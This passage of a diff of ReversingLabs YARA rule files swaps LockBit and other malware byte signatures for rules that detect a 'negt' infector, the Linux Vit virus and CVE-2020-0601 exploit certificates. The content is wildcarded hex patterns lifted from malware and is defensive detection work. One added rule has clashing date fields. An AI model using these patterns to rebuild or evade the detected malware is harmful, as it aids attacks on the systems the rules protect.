?? A1 ?? + ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 03 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A 00 6A 00 } - $unzip_packed_file = { - 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 0B 06 07 2E ?? 07 06 28 ?? ?? ?? ?? 2D ?? 14 - 2A 02 73 ?? ?? ?? ?? 0C 16 8D ?? ?? ?? ?? 0D 08 6F ?? ?? ?? ?? 13 04 11 04 20 - ?? ?? ?? ?? 40 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 68 13 05 08 6F ?? ?? ?? ?? 13 06 - 08 6F ?? ?? ?? ?? 13 07 11 04 20 ?? ?? ?? ?? 33 ?? 11 05 1F 14 33 ?? 11 06 2D - ?? 11 07 1E 2E ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ?? ?? 26 08 6F - ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 13 08 08 6F ?? ?? ?? ?? - 13 09 08 6F ?? ?? ?? ?? 13 0A 11 09 16 31 ?? 11 09 8D ?? ?? ?? ?? 13 0B 08 11 - 0B 16 11 09 6F ?? ?? ?? ?? 26 11 0A 16 31 ?? 11 0A 8D ?? ?? ?? ?? 13 0C 08 11 - 0C 16 11 0A 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 59 D4 8D ?? - ?? ?? ?? 13 0D 08 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ?? 26 11 0D 73 ?? ?? ?? ?? - 13 0E 11 08 8D ?? ?? ?? ?? 0D 11 0E 09 16 09 8E 69 6F ?? ?? ?? ?? 26 14 13 0D - 38 ?? ?? ?? ?? 11 04 1F 18 63 13 0F 11 04 11 0F 1F 18 62 59 13 04 11 04 20 ?? - ?? ?? ?? 40 ?? ?? ?? ?? 11 0F 17 33 ?? 08 6F ?? ?? ?? ?? 13 10 11 10 8D ?? ?? - ?? ?? 0D 16 13 11 2B ?? 08 6F ?? ?? ?? ?? 13 12 08 6F ?? ?? ?? ?? 13 13 11 12 - 8D ?? ?? ?? ?? 13 15 08 11 15 16 11 15 8E 69 6F ?? ?? ?? ?? 26 11 15 73 ?? ?? - ?? ?? 13 14 11 14 09 11 11 11 13 6F ?? ?? ?? ?? 26 11 11 11 13 58 13 11 11 11 - 11 10 32 ?? 11 0F 18 33 ?? 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 13 16 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 17 11 16 11 17 17 - 28 ?? ?? ?? ?? 13 18 11 18 02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 19 11 19 28 - ?? ?? ?? ?? 0D DE ?? 11 18 2C ?? 11 18 6F ?? ?? ?? ?? DC 11 0F 19 33 ?? 1F 10 - 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1A 1F 10 8D ?? ?? ?? ?? 25 - D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1B 11 1A 11 1B 17 28 ?? ?? ?? ?? 13 1C 11 1C - 02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 1D 11 1D 28 ?? ?? ?? ?? 0D DE 17 11 1C - 2C ?? 11 1C 6F ?? ?? ?? ?? DC 72 B5 0E 00 70 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ?? - ?? 14 0C 09 2A + $negt_body_and_infector_4 = { + FF 75 F4 FF 75 FC E8 63 03 00 00 6A 00 8D 45 F0 50 68 F8 00 00 00 68 ?? ?? ?? ?? FF 75 FC E8 51 03 00 00 83 6D F4 0B 6A + 00 6A 00 FF 75 F4 FF 75 FC E8 38 03 00 00 6A 00 8D 45 F0 50 6A 0B 68 ?? ?? ?? ?? FF 75 FC E8 29 03 00 00 6A 00 6A 20 6A + 03 6A 00 6A 01 68 00 00 00 80 68 ?? ?? ?? ?? E8 C8 02 00 00 89 45 F8 6A 00 6A 00 6A 00 FF 75 F8 E8 F9 02 00 00 6A 00 8D + 45 F0 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 F8 E8 D3 02 00 00 8B 75 F0 6A 02 6A 00 6A 00 FF 75 FC E8 CE 02 00 00 + 6A 00 8D 45 F0 50 56 8D 85 ?? ?? ?? ?? 50 FF 75 FC E8 BE 02 00 00 FF 75 FC E8 62 02 00 00 FF 75 F8 E8 5A 02 00 00 59 C9 + C2 04 00 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00 + FF 95 ?? ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A + 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ?? + ?? FF 95 ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00 + 01 00 00 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00 + 50 53 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? + FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3 } - $resolve_assembly = { - 12 00 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 12 00 16 28 ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 - 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 13 11 13 16 1F - 2C 9D 11 13 6F ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 13 04 16 13 05 16 13 06 16 13 07 2B ?? - 09 11 07 9A 08 28 ?? ?? ?? ?? 2C 0A 09 11 07 17 58 9A 13 04 2B ?? 11 07 18 58 13 07 - 11 07 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 2D ?? 12 00 7B ?? ?? ?? ?? 6F ?? ?? - ?? ?? 2D ?? 28 ?? ?? ?? ?? 12 00 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 16 - 13 08 2B ?? 09 11 08 9A 08 28 ?? ?? ?? ?? 2C ?? 09 11 08 17 58 9A 13 04 2B ?? 11 08 - 18 58 13 08 11 08 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 11 04 - 16 6F ?? ?? ?? ?? 1F 5B 33 ?? 11 04 1F 5D 6F ?? ?? ?? ?? 13 09 11 04 17 11 09 17 59 - 6F ?? ?? ?? ?? 13 0A 11 0A 1F 7A 6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 05 11 0A 1F 74 - 6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 06 11 04 11 09 17 58 6F ?? ?? ?? ?? 13 04 7E ?? - ?? ?? ?? 25 13 14 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 04 6F ?? ?? ?? ?? 2C ?? 7E ?? ?? - ?? ?? 11 04 6F ?? ?? ?? ?? 13 12 DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 6F ?? ?? ?? ?? - 13 0B 11 0B 39 ?? ?? ?? ?? 11 0B 6F ?? ?? ?? ?? 69 13 0C 11 0C 8D ?? ?? ?? ?? 13 0D - 11 0B 11 0D 16 11 0C 6F ?? ?? ?? ?? 26 11 05 2C ?? 11 0D 28 ?? ?? ?? ?? 13 0D 14 13 - 0E 11 06 2D ?? 11 0D 28 ?? ?? ?? ?? 13 0E DE 0C 26 17 13 06 DE ?? 26 17 13 06 DE ?? - 11 06 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 28 ?? ?? ?? ?? 13 0F 11 0F 28 ?? ?? - ?? ?? 26 11 0F 12 00 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 10 11 10 28 ?? - ?? ?? ?? 2D ?? 11 10 28 ?? ?? ?? ?? 13 11 11 11 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ?? - 11 11 6F ?? ?? ?? ?? 11 10 14 1A 28 ?? ?? ?? ?? 26 11 0F 14 1A 28 ?? ?? ?? ?? 26 11 - 10 28 ?? ?? ?? ?? 13 0E DE ?? 26 DE ?? 7E ?? ?? ?? ?? 11 04 11 0E 6F ?? ?? ?? ?? 11 - 0E 13 12 DE ?? DE ?? 11 14 28 ?? ?? ?? ?? DC 14 2A 11 12 2A + $negt_infector = { + E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00 FF 95 ?? + ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 6A 20 + 6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ?? ?? FF 95 + ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00 01 00 00 + FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00 50 53 FF + B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? + ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3 } condition: - uint16(0)==0x5A4D and (($call_encrypt and $encrypt_files and $start_process) or ($msgbox_timer) or ($unzip_packed_file and $resolve_assembly)) + uint16(0)==0x5A4D and (($negt_infector at pe.entry_point) or (($negt_body_and_infector_1 at pe.entry_point) and $negt_body_and_infector_2 and $negt_body_and_infector_3 and $negt_body_and_infector_4)) } -rule REVERSINGLABS_Win32_Ransomware_Lockbit : TC_DETECTION MALICIOUS MALWARE FILE +import "elf" + +rule REVERSINGLABS_Linux_Virus_Vit : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects LockBit ransomware." + description = "Yara rule that detects Vit virus." author = "ReversingLabs" - id = "9a6405dc-da1f-5426-a424-a73bceb1928c" - date = "2022-03-31" - modified = "2022-03-31" + id = "4515fe43-4c5a-521d-82b7-273823f0c64e" + date = "2024-09-29" + date = "2024-09-29" + modified = "2023-06-07" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.LockBit.yara#L1-L282" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "030222bd659c7e0e03858fa062067b1483aca3b7973cce19a1e7cdbb48d4405c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/virus/Linux.Virus.Vit.yara#L3-L36" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2fba7a081dfca85aee5c7f3b33414b799ed52ca6aa5bbf031da040aaa75acde9" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "LockBit" + tc_detection_type = "Virus" tc_detection_factor = 5 importance = 25 strings: - $enum_resources_v1 = { - 55 8B EC 83 EC ?? 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? - ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 56 FF 75 ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 - C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 33 DB 39 5D ?? 76 ?? 8B F7 0F 1F 80 ?? ?? ?? ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8B CE E8 - ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 45 - ?? FF 70 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 8B 45 ?? FF 70 ?? 57 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B - 0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? F0 FF 05 ?? ?? ?? ?? 8B 7D ?? 43 83 C6 ?? 3B 5D - ?? 72 ?? E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 5B 85 C0 - 75 ?? B8 ?? ?? ?? ?? 5F 8B E5 5D C3 33 C0 5F 8B E5 5D C3 + $vit_entry_point = { + 55 89 E5 81 EC 40 31 00 00 57 56 50 53 51 52 C7 85 D8 CE FF FF 00 00 00 00 C7 85 D4 + CE FF FF 00 00 00 00 C7 85 FC CF FF FF CA 08 00 00 C7 85 F8 CF FF FF B8 06 00 00 C7 + 85 F4 CF FF FF AD 08 00 00 C7 85 F0 CF FF FF 50 06 00 00 6A 00 6A 00 8B 45 08 50 E8 + 18 FA FF FF 89 C6 83 C4 0C 85 F6 0F 8C E6 01 00 00 6A 00 68 ?? ?? ?? ?? 56 E8 2E FA + FF FF 83 C4 0C 85 C0 0F 8C C4 01 00 00 8B 85 FC CF FF FF 50 8D 85 00 D0 FF FF 50 56 + E8 2A FA FF FF 89 C2 8B 85 FC CF FF FF 83 C4 0C 39 C2 0F 85 9D 01 00 00 56 E8 E1 F9 + FF FF BE FF FF FF FF 6A 00 6A 00 E9 + } + $vit_str = "vi324.tmp" + + condition: + uint32(0)==0x464C457F and $vit_entry_point at elf.entry_point and $vit_str +} +import "pe" + +rule REVERSINGLABS_Win32_Exploit_CVE20200601 : TC_DETECTION MALICIOUS EXPLOIT CVE_2020_0601 FILE +{ + meta: + description = "Yara rule that detects CVE-2020-0601 exploit." + author = "ReversingLabs" + id = "6a03fd5e-3b7f-5b71-b897-5cac81721a56" + date = "2020-07-15" + modified = "2020-07-15" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/exploit/Win32.Exploit.CVE20200601.yara#L3-L253" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e4d915560ad72e0fde63276f9ffece00535c7983125efaa8298adc11d5e54817" + score = 75 + quality = 88 + tags = "TC_DETECTION, MALICIOUS, EXPLOIT, CVE-2020-0601, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "EXPLOIT" + exploit = "CVE-2020-0601" + tc_detection_type = "Exploit" + tc_detection_name = "CVE-2020-0601" + tc_detection_factor = 5 + importance = 25 + + strings: + $oid_prime_explicit = { + 06 07 2A 86 48 CE 3D 01 01 } - $find_files_v1_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B C1 C7 45 ?? ?? ?? ?? ?? 57 50 89 45 ?? 33 C9 8D - 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 4D ?? 50 FF 15 ?? ?? ?? ?? 83 - C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? - ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 33 C0 8B 35 ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D - 45 ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D3 85 C0 - 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 - C0 0F 84 + $ecc_public_key_1 = { + 04 47 45 0E 96 FB 7D 5D BF E9 39 D1 21 F8 9F 0B + B6 D5 7B 1E 92 3A 48 59 1C F0 62 31 2D C0 7A 28 + FE 1A A7 5C B3 B6 CC 97 E7 45 D4 58 FA D1 77 6D + 43 A2 C0 87 65 34 0A 1F 7A DD EB 3C 33 A1 C5 9D + 4D A4 6F 41 95 38 7F C9 1E 84 EB D1 9E 49 92 87 + 94 87 0C 3A 85 4A 66 9F 9D 59 93 4D 97 61 06 86 + 4A } - $find_files_v1_2 = { - 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? E9 ?? ?? ?? ?? 33 C9 66 39 8D ?? ?? ?? ?? 74 ?? 8D 40 ?? 41 66 83 38 ?? 75 ?? - 83 F9 ?? 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 56 68 ?? ?? - ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? - 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 + $ecc_public_key_2 = { + 04 84 13 C9 D0 BA 6D 41 7B E2 6C D0 EB 55 5F 66 + 02 1A 24 F4 5B 89 69 47 E3 B8 C2 7D F1 F2 02 C5 + 9F A0 F6 5B D5 8B 06 19 86 4F 53 10 6D 07 24 27 + A1 A0 F8 D5 47 19 61 4C 7D CA 93 27 EA 74 0C EF + 6F 96 09 FE 63 EC 70 5D 36 AD 67 77 AE C9 9D 7C + 55 44 3A A2 63 51 1F F5 E3 62 D4 A9 47 07 3E CC + 20 } - $find_files_v1_3 = { - 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? - ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? - 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 - ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 C9 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? - ?? ?? 66 90 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 33 C0 C6 45 ?? ?? 66 89 45 ?? 8D - 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 - C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 - ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 - 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? - ?? ?? 8B 4D ?? 8D 95 ?? ?? ?? ?? 2B D1 0F B7 01 8D 49 ?? 66 89 44 11 ?? 66 85 C0 75 - ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ?? - 66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 C7 ?? 0F 1F 40 ?? 66 8B 47 ?? 83 C7 ?? 66 - 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 A8 ?? 75 ?? - A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6 - 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 5F - 5E 5B 8B E5 5D C3 + $ecc_public_key_3 = { + 04 A7 56 7A 7C 52 DA 64 9B 0E 2D 5C D8 5E AC 92 + 3D FE 01 E6 19 4A 3D 14 03 4B FA 60 27 20 D9 83 + 89 69 FA 54 C6 9A 18 5E 55 2A 64 DE 06 F6 8D 4A + 3B AD 10 3C 65 3D 90 88 04 89 E0 30 61 B3 AE 5D + 01 A7 7B DE 7C B2 BE CA 65 61 00 86 AE DA 8F 7B + D0 89 AD 4D 1D 59 9A 41 B1 BC 47 80 DC 9E 62 C3 + F9 } - $encrypt_files_v1_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 53 56 57 8B F9 C7 45 ?? ?? ?? - ?? ?? 89 7D ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 - 89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + $ecc_public_key_4 = { + 04 CD 0F 5B 56 82 DF F0 45 1A D6 AD F7 79 F0 1D + C9 AC 96 D6 9E 4E 9C 1F B4 42 11 CA 86 BF 6D FB + 85 A3 C5 E5 19 5C D7 EE A6 3F 69 67 D8 78 E2 A6 + C9 C4 DB 2D 79 2E E7 8B 8D 02 6F 31 22 4D 06 E3 + 60 72 45 9D 0E 42 77 9E CE CF E5 7F 85 9B 18 E4 + FC CC 2E 72 D3 16 93 4E CA 99 63 5C A1 05 2A 6C + 06 } - $encrypt_files_v1_2 = { - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 33 DB 89 7D ?? 33 F6 0F 1F 00 8B 84 - B5 ?? ?? ?? ?? 85 C0 74 ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 B8 ?? ?? ?? ?? 0F 44 D8 46 - 81 FE ?? ?? ?? ?? 7C ?? 8B 7D ?? 33 C0 66 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 57 50 8D 85 ?? ?? ?? ?? 89 5D ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? - 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D3 83 F8 ?? 75 - ?? 8B CF E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B + $ecc_public_key_5 = { + 04 57 CF EA B3 39 4D 3F A1 21 E0 6E 2F 38 72 C6 + 87 97 F3 85 0B 47 E7 0F 51 C8 D1 F4 99 9B CA 59 + 65 FF 4C F9 EA 0B B7 25 D5 D2 F6 EC 31 2D 32 62 + 12 D7 76 86 A7 FA 38 C9 65 D4 FE 73 E2 84 39 F8 + 4C 49 62 13 DD BA D5 88 A0 5F 3D C8 4F B0 3F 8F + A1 50 11 E4 93 46 AD C3 5F CB F1 A4 6A 95 56 E8 + C0 } - $encrypt_files_v1_3 = { - CF E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 FE ?? 7D ?? 46 EB ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 - FB ?? 75 ?? 8B 1D ?? ?? ?? ?? EB ?? FF 35 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 53 FF - 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B - E5 5D C3 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? FF 75 ?? FF 15 - ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 45 ?? 8B 75 ?? 89 43 ?? 8D 43 ?? 50 56 C7 - 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ?? - ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 4B ?? 8B 43 ?? 85 - C9 7F ?? 7C ?? 83 F8 ?? 72 ?? 83 E8 ?? C7 43 ?? ?? ?? ?? ?? 89 43 ?? 8B 43 ?? 83 D9 - ?? 89 43 ?? 8B 43 ?? 89 43 ?? 8D 83 ?? ?? ?? ?? 6A ?? 50 89 4B ?? C7 43 ?? ?? ?? ?? - ?? 89 73 ?? E8 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 6A ?? - 8D 73 ?? 56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? - ?? ?? ?? 74 ?? 56 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 FF D6 83 C4 ?? FF 75 ?? FF 15 - ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 F0 FF 05 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? - B8 ?? ?? ?? ?? F0 0F C1 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7E ?? 8B 35 ?? ?? ?? ?? 6A - ?? FF D6 83 3D ?? ?? ?? ?? ?? 7D ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 + $ecc_public_key_6 = { + 04 D1 D9 4A 8E 4C 0D 84 4A 51 BA 